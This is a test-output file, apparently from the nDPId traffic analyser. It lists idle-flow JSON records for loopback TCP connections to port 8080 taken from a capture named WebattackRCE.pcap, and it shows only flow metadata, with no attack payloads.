00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277277,"flow_last_seen":1576420277277,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50304,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277278,"flow_last_seen":1576420277278,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50306,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277279,"flow_last_seen":1576420277279,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50308,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277281,"flow_last_seen":1576420277281,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50310,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277282,"flow_last_seen":1576420277282,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50312,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277283,"flow_last_seen":1576420277283,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50314,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277284,"flow_last_seen":1576420277284,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50316,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277286,"flow_last_seen":1576420277286,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50318,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277288,"flow_last_seen":1576420277288,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50320,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277291,"flow_last_seen":1576420277291,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50322,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277292,"flow_last_seen":1576420277292,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50324,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277293,"flow_last_seen":1576420277293,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50326,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277295,"flow_last_seen":1576420277295,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50328,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277296,"flow_last_seen":1576420277296,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50330,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277298,"flow_last_seen":1576420277298,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50332,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277299,"flow_last_seen":1576420277299,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50334,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277301,"flow_last_seen":1576420277301,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50336,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277302,"flow_last_seen":1576420277302,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50338,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277304,"flow_last_seen":1576420277304,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50340,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277306,"flow_last_seen":1576420277306,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50342,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277307,"flow_last_seen":1576420277307,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50344,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277308,"flow_last_seen":1576420277308,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50346,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277309,"flow_last_seen":1576420277309,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50348,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277310,"flow_last_seen":1576420277310,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50350,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277311,"flow_last_seen":1576420277311,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50352,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277313,"flow_last_seen":1576420277313,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50354,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277314,"flow_last_seen":1576420277314,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50356,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277315,"flow_last_seen":1576420277315,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50358,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277317,"flow_last_seen":1576420277317,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50360,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277319,"flow_last_seen":1576420277319,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50362,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277321,"flow_last_seen":1576420277321,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50364,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277322,"flow_last_seen":1576420277322,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50366,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277324,"flow_last_seen":1576420277324,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50368,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277325,"flow_last_seen":1576420277325,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50370,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277326,"flow_last_seen":1576420277326,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50372,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277328,"flow_last_seen":1576420277328,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50374,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277329,"flow_last_seen":1576420277329,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50376,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277331,"flow_last_seen":1576420277331,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50378,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277333,"flow_last_seen":1576420277333,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50380,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277334,"flow_last_seen":1576420277334,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50382,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277336,"flow_last_seen":1576420277336,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50384,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277337,"flow_last_seen":1576420277337,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50386,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277339,"flow_last_seen":1576420277339,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50388,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277340,"flow_last_seen":1576420277340,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50390,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277342,"flow_last_seen":1576420277342,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50392,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277343,"flow_last_seen":1576420277343,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50394,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277344,"flow_last_seen":1576420277344,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50396,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
